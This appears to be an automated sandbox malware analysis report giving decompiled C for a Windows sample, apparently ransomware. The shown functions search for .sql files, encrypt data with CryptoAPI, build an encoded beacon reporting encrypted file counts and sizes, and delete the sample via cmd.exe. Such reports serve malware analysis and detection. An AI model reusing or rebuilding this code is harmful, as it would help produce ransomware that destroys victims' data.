C-Code - Quality: 91%

			E0F1D6420(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0F1D62B0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0f1d6423
0x0f1d6424
0x0f1d6435
0x0f1d643e
0x0f1d644f
0x0f1d6458
0x0f1d645d
0x0f1d6467
0x0f1d6485
0x0f1d6489
0x0f1d6493
0x0f1d6498
0x0f1d6498
0x0f1d64a2
0x0f1d64af

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0F1D49CE), ref: 0F1D6435
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0F1D49CE), ref: 0F1D644F

Part of subcall function 0F1D62B0: CryptAcquireContextW.ADVAPI32(0F1D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0F1D49C6,?,0F1D49CE), ref: 0F1D62C5
Part of subcall function 0F1D62B0: GetLastError.KERNEL32(?,0F1D49CE), ref: 0F1D62CF
Part of subcall function 0F1D62B0: CryptAcquireContextW.ADVAPI32(0F1D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1D49CE), ref: 0F1D62EB

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: 88a1e610f4af0f248c3cfa31cc18d49de241bbce13b3213c6ad3db18582998ae
Instruction ID: dcb7a307d992d4a506d9147b15650a20ad402a1c0a7d0996c921c7590da87192
Opcode Fuzzy Hash: 88a1e610f4af0f248c3cfa31cc18d49de241bbce13b3213c6ad3db18582998ae
Instruction Fuzzy Hash: 6F11DB74A41208EFD704CF88DA55F99B7F5EF88705F208188E904AB382D7B5AF109B54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F1D6A40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D6A40(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F1D8100(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F1D69E0(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0f1d6a4b
0x0f1d6a4f
0x0f1d6a5e
0x0f1d6a61
0x0f1d6a64
0x0f1d6a7e
0x0f1d6a83
0x0f1d6a86
0x0f1d6a90
0x0f1d6aa0
0x00000000
0x0f1d6abc
0x0f1d6ac4
0x0f1d6acb
0x0f1d6ad1
0x0f1d6ad4
0x0f1d6ad9
0x0f1d6ba8
0x0f1d6ba8
0x00000000
0x0f1d6ae0
0x0f1d6ae0
0x0f1d6ae6
0x0f1d6ae9
0x0f1d6aea
0x00000000
0x00000000
0x00000000
0x0f1d6aea
0x0f1d6aee
0x00000000
0x0f1d6af4
0x0f1d6afa
0x0f1d6afe
0x00000000
0x0f1d6b04
0x0f1d6b17
0x0f1d6b22
0x0f1d6b26
0x0f1d6b2f
0x0f1d6b40
0x0f1d6b44
0x0f1d6b57
0x0f1d6b6e
0x0f1d6b74
0x0f1d6b7e
0x0f1d6b7e
0x0f1d6b89
0x0f1d6b89
0x0f1d6b8f
0x0f1d6b8f
0x0f1d6b93
0x0f1d6b99
0x0f1d6b9e
0x0f1d6baa
0x0f1d6baf
0x00000000
0x0f1d6baf
0x0f1d6b9e
0x0f1d6afe
0x0f1d6aee
0x0f1d6ad9
0x00000000
0x0f1d6bb2
0x0f1d6bc2
0x0f1d6bcd
0x0f1d6bdb

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F1D6A52
lstrcatW.KERNEL32(00000000,0F1DFEC4), ref: 0F1D6A64
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F1D6A72
lstrcmpW.KERNEL32(?,0F1DFEC8,?,?), ref: 0F1D6A9C
lstrcmpW.KERNEL32(?,0F1DFECC,?,?), ref: 0F1D6AB2
lstrcatW.KERNEL32(00000000,?), ref: 0F1D6AC4
lstrlenW.KERNEL32(00000000,?,?), ref: 0F1D6ACB
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F1D6AFA
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F1D6B11
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F1D6B1C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F1D6B3A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F1D6B4F
lstrlenA.KERNEL32(*******************,?,?), ref: 0F1D6B6E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F1D6B89
CloseHandle.KERNEL32(00000000,?,?), ref: 0F1D6B93
FindNextFileW.KERNEL32(?,?,?,?), ref: 0F1D6BBC
FindClose.KERNEL32(?,?,?), ref: 0F1D6BCD

Strings

.sql, xrefs: 0F1D6AF4
*******************, xrefs: 0F1D6B59, 0F1D6B69

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 87ec8072b7022002fa2d7757c092df419e7f81e9c56791fc37b7766105a8e930
Instruction ID: e686d6715cfdb662fb69dd1e914a22840e727ea2a0114b017bd5203fd060bfa7
Opcode Fuzzy Hash: 87ec8072b7022002fa2d7757c092df419e7f81e9c56791fc37b7766105a8e930
Instruction Fuzzy Hash: F1417071A0321AAFDB20DF649C49FAF77BCEF44712F414065F902E2142DB79AA65CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D5670 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0F1D5670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t88 = __edx;
				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E0F1D39F0( &_v180);
				E0F1D7330( &_v180, _t88);
				E0F1D7140( &_v180);
				E0F1D6F40( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xf1dfc78]");
				_v28 = _t79;
				_t80 =  *0xf1dfc84; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xf1dfc86; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E0F1D9010( &_v435, 0, 0xff);
				E0F1D5D70( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E0F1D5E20( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E0F1D54A0(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F1D7C10( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0f1d5670
0x0f1d5670
0x0f1d568a
0x0f1d568c
0x0f1d568f
0x0f1d5695
0x0f1d569a
0x0f1d56a6
0x0f1d56a8
0x0f1d569c
0x0f1d569c
0x0f1d569c
0x0f1d56a2
0x0f1d56a2
0x0f1d56aa
0x0f1d56ae
0x0f1d56bd
0x0f1d56c6
0x0f1d56c8
0x0f1d56c9
0x0f1d56ce
0x0f1d56d0
0x0f1d56d1
0x0f1d56d3
0x0f1d56d4
0x0f1d56d6
0x0f1d56d7
0x0f1d56d9
0x0f1d56da
0x0f1d56df
0x0f1d56e1
0x0f1d56e2
0x0f1d56ea
0x0f1d56f5
0x0f1d5700
0x0f1d5718
0x0f1d571e
0x0f1d5720
0x0f1d5726
0x0f1d5728
0x0f1d5736
0x0f1d5739
0x0f1d5745
0x0f1d5749
0x0f1d5752
0x0f1d5757
0x0f1d575a
0x0f1d5761
0x0f1d577d
0x0f1d5785
0x0f1d5792
0x0f1d57a1
0x0f1d57ba
0x0f1d57bc
0x0f1d57bc
0x0f1d57d2
0x0f1d57d2
0x0f1d57df
0x0f1d57e2
0x0f1d57e4
0x0f1d57e7
0x0f1d57ec
0x0f1d57f5
0x0f1d57f5
0x0f1d57ee
0x0f1d57ee
0x0f1d57f3
0x00000000
0x00000000
0x0f1d57f3
0x0f1d57fd
0x0f1d5803
0x0f1d5805
0x0f1d5808
0x0f1d5808
0x0f1d580d
0x0f1d5813
0x0f1d5815
0x0f1d5815
0x0f1d5817
0x0f1d581e
0x0f1d5808
0x0f1d5829
0x0f1d5843
0x0f1d5850
0x0f1d5858
0x0f1d5867
0x0f1d586b
0x0f1d5871

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F1D568F
wsprintfW.USER32 ref: 0F1D56BD
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F1D570C
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F1D571E
_memset.LIBCMT ref: 0F1D5761
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0F1D576D
CryptBinaryToStringA.CRYPT32(?,772969A0,40000001,00000000,00000000), ref: 0F1D57B2
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D57BC
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D57C9
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D57D8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D57E2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D57FF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D5818
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D5850
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F1D5867

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F1D56B7
#shasj, xrefs: 0F1D5720

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 30282f47def3d308c8f074adae36d365728226341b1b5ded3260398f47c80668
Instruction ID: 252b1412519d46feaee6f9f1db2706c22ed0852080d6202b80ada8c3576cb6c3
Opcode Fuzzy Hash: 30282f47def3d308c8f074adae36d365728226341b1b5ded3260398f47c80668
Instruction Fuzzy Hash: F251F371901319ABEB20EB65DC45FEFBB79EF44300F540164FA05A7182EB787A64CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D5210 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0F1D5210(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				long _v12;
				char _v14;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				CHAR** _v32;
				void* _v36;
				char _v291;
				char _v292;
				void* _v348;
				void* _v352;
				int _t43;
				BYTE* _t44;
				int _t46;
				void* _t50;
				void* _t51;
				char _t52;
				void* _t64;
				signed int _t66;
				signed int _t68;
				int _t69;
				int _t72;
				char _t74;
				intOrPtr _t75;
				CHAR* _t84;
				char* _t86;
				void* _t88;
				signed char _t89;
				WCHAR* _t94;
				CHAR* _t95;
				BYTE* _t101;
				WCHAR* _t102;
				WCHAR* _t103;
				void* _t104;
				long _t105;
				long _t106;
				int _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;

				_t86 = __ecx;
				_v32 = __edx;
				_t43 = lstrlenA(__ecx) + 1;
				_v8 = _t43;
				_t3 = _t43 + 1; // 0x2
				_t105 = _t3;
				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
				_v36 = _t44;
				if(_t44 == 0 || _v8 >= _t105) {
					_t101 = 0;
					__eflags = 0;
				} else {
					_t101 = _t44;
				}
				_t106 = 0;
				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
				_t119 = _t46;
				if(_t46 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t50 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xf1dfc78]");
					_t107 = _v8;
					_v20 = _t50;
					_t51 =  *0xf1dfc84; // 0x6a73
					_v16 = _t51;
					_t52 =  *0xf1dfc86; // 0x0
					_v14 = _t52;
					asm("movq [ebp-0x18], xmm0");
					_v292 = 0;
					E0F1D9010( &_v291, 0, 0xff);
					E0F1D5D70( &_v292,  &_v28, lstrlenA( &_v28));
					E0F1D5E20( &_v292, _t101, _t107);
					_t94 =  &_v28;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x18], xmm0");
					E0F1D33E0(_t94, _t119, _t101);
					if(_v28 != 0) {
						E0F1D5190();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(lstrlenA);
						_push(_t107);
						_push(_t101);
						_t102 = _t94;
						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v352 = _t108;
						GetModuleFileNameW(0, _t108, 0x200);
						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
						_v348 = _t88;
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
							_v28 = _t64;
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
								_v16 = _t66;
								__eflags = _t66;
								if(_t66 != 0) {
									_t29 = _t66 + 0x4e; // 0x4e
									_t109 = _t29;
									_v12 = _t109;
									_t68 = lstrlenW(_t102);
									_t89 = 0;
									_t103 =  &(_t102[_t68]);
									_t69 = lstrlenA(_t109);
									__eflags = _t69 + _t69;
									if(_t69 + _t69 != 0) {
										_t95 = _t109;
										do {
											__eflags = _t89 & 0x00000001;
											if((_t89 & 0x00000001) != 0) {
												 *((char*)(_t103 + _t89)) = 0;
											} else {
												_t74 =  *_t109;
												_t109 =  &(_t109[1]);
												 *((char*)(_t103 + _t89)) = _t74;
											}
											_t89 = _t89 + 1;
											_t72 = lstrlenA(_t95);
											_t95 = _v12;
											__eflags = _t89 - _t72 + _t72;
										} while (_t89 < _t72 + _t72);
									}
									UnmapViewOfFile(_v16);
									_t88 = _v20;
									_t108 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t88);
						}
						return VirtualFree(_t108, 0, 0x8000);
					} else {
						_t104 = _v24;
						_t75 =  *0xf1e2a60; // 0x0
						_t110 = _v20;
						_t76 =  !=  ? 0 : _t75;
						_v12 = 1;
						 *0xf1e2a60 =  !=  ? 0 : _t75;
						if(_t110 != 0) {
							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
							 *_v32 = _t84;
							if(_t84 != 0) {
								lstrcpyA(_t84, _t110);
							}
						}
						_t77 = GetProcessHeap;
						if(_t104 != 0) {
							HeapFree(GetProcessHeap(), 0, _t104);
							_t77 = GetProcessHeap;
						}
						if(_t110 != 0) {
							HeapFree( *_t77(), 0, _t110);
						}
						_t106 = _v12;
						L14:
						VirtualFree(_v36, 0, 0x8000);
						return _t106;
					}
				}
			}

0x0f1d521c
0x0f1d521e
0x0f1d5228
0x0f1d5230
0x0f1d5233
0x0f1d5233
0x0f1d5239
0x0f1d523f
0x0f1d5244
0x0f1d524f
0x0f1d524f
0x0f1d524b
0x0f1d524b
0x0f1d524b
0x0f1d5251
0x0f1d525e
0x0f1d5264
0x0f1d5266
0x0f1d5385
0x00000000
0x0f1d526c
0x0f1d526c
0x0f1d5271
0x0f1d5279
0x0f1d527c
0x0f1d527f
0x0f1d5285
0x0f1d5289
0x0f1d5293
0x0f1d529f
0x0f1d52a4
0x0f1d52ab
0x0f1d52c9
0x0f1d52d7
0x0f1d52df
0x0f1d52e2
0x0f1d52e5
0x0f1d52eb
0x0f1d52f4
0x0f1d538d
0x0f1d5392
0x0f1d5393
0x0f1d5394
0x0f1d5395
0x0f1d5396
0x0f1d5397
0x0f1d5398
0x0f1d5399
0x0f1d539a
0x0f1d539b
0x0f1d539c
0x0f1d539d
0x0f1d539e
0x0f1d539f
0x0f1d53a6
0x0f1d53a7
0x0f1d53a8
0x0f1d53b7
0x0f1d53bf
0x0f1d53c9
0x0f1d53cc
0x0f1d53eb
0x0f1d53ed
0x0f1d53f0
0x0f1d53f3
0x0f1d5404
0x0f1d540a
0x0f1d540d
0x0f1d540f
0x0f1d541a
0x0f1d5420
0x0f1d5423
0x0f1d5425
0x0f1d5427
0x0f1d5427
0x0f1d542b
0x0f1d542e
0x0f1d5435
0x0f1d5437
0x0f1d543a
0x0f1d5440
0x0f1d5442
0x0f1d5444
0x0f1d5446
0x0f1d5446
0x0f1d5449
0x0f1d5453
0x0f1d544b
0x0f1d544b
0x0f1d544d
0x0f1d544e
0x0f1d544e
0x0f1d5458
0x0f1d5459
0x0f1d545f
0x0f1d5464
0x0f1d5464
0x0f1d5446
0x0f1d546b
0x0f1d5471
0x0f1d5474
0x0f1d5474
0x0f1d547a
0x0f1d547a
0x0f1d5481
0x0f1d5481
0x0f1d549b
0x0f1d52fa
0x0f1d52fa
0x0f1d52ff
0x0f1d5306
0x0f1d5309
0x0f1d530c
0x0f1d5313
0x0f1d531a
0x0f1d532a
0x0f1d5333
0x0f1d5337
0x0f1d533b
0x0f1d533b
0x0f1d5337
0x0f1d5347
0x0f1d534e
0x0f1d5356
0x0f1d5358
0x0f1d5358
0x0f1d535f
0x0f1d5367
0x0f1d5367
0x0f1d5369
0x0f1d536c
0x0f1d5376
0x0f1d5384
0x0f1d5384
0x0f1d52f4

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 0F1D5222
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F1D5239
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F1D525E
_memset.LIBCMT ref: 0F1D52AB
lstrlenA.KERNEL32(?), ref: 0F1D52BD
lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0F1D5324
VirtualAlloc.KERNEL32(00000000,00000001), ref: 0F1D532A
lstrcpyA.KERNEL32(00000000,?), ref: 0F1D533B
HeapFree.KERNEL32(00000000), ref: 0F1D5356
HeapFree.KERNEL32(00000000), ref: 0F1D5367
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5376
GetLastError.KERNEL32 ref: 0F1D5385

Part of subcall function 0F1D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F1D5392,00000000), ref: 0F1D51A6
Part of subcall function 0F1D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F1D51B8
Part of subcall function 0F1D5190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F1D51C8
Part of subcall function 0F1D5190: wsprintfW.USER32 ref: 0F1D51D9
Part of subcall function 0F1D5190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F1D51F3
Part of subcall function 0F1D5190: ExitProcess.KERNEL32 ref: 0F1D51FB

Strings

#shasj, xrefs: 0F1D526C

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
String ID: #shasj
API String ID: 834684195-2423951532
Opcode ID: b66e1dabe074b587303b4096423d19728091f0c234d2af230a434aa868f149fc
Instruction ID: 9114e072bcffab8ff1b7dd2c28abc8fa9164fcc322bd8c752f7be3971b7312e4
Opcode Fuzzy Hash: b66e1dabe074b587303b4096423d19728091f0c234d2af230a434aa868f149fc
Instruction Fuzzy Hash: 4D419571A02219ABDB10DBA59C44BEFBB7DEF49711F040115F905E7242DB78AAA0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F1D6530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xf1e2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0F1D34F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xf1e2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f1d653b
0x0f1d6541
0x0f1d6548
0x0f1d655a
0x0f1d655e
0x0f1d6566
0x0f1d659e
0x0f1d659e
0x0f1d65c1
0x0f1d65c3
0x0f1d65cc
0x0f1d65da
0x0f1d65e0
0x0f1d65e6
0x0f1d65f4
0x0f1d6602
0x0f1d6608
0x0f1d6611
0x0f1d6618
0x0f1d661d
0x0f1d661d
0x0f1d6618
0x0f1d6628
0x0f1d6633
0x00000000
0x0f1d6639
0x0f1d6568
0x0f1d6573
0x00000000
0x0f1d6597
0x0f1d6584
0x0f1d658c
0x00000000
0x0f1d6595
0x00000000

APIs

EnterCriticalSection.KERNEL32(0F1E2A48,?,0F1D3724,00000000,00000000,00000000,?,00000800), ref: 0F1D653B
